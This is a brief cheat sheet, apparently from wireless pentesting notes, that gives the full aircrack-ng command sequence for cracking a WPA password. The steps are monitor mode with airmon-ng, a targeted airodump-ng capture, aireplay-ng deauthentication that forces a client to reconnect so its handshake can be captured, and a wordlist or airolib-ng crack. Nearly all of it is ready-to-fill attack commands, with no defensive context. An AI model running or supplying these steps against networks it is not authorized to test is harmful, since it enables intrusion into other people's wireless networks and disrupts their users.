Cracking WPA Attack
----------------------------

Begin by placing your wireless card into monitor mode on the channel number of the AP:

airmon-ng start <interface> <AP channel>

Start an Airodump capture, filtering on the AP channel and BSSID, saving the capture to
disk:

airodump-ng -c <AP channel> --bssid <AP MAC> -w <capture> <interface>

Deauthenticate a connected client to force it to complete the 4-way handshake:

aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> <interface>

Crack the WPA password with Aircrack-ng:

aircrack-ng -w <wordlist> <capture>

Alternatively, if you have and Airolib-ng database, it can be passed to Aircrack:

aircrack-ng -r <db name> <capture>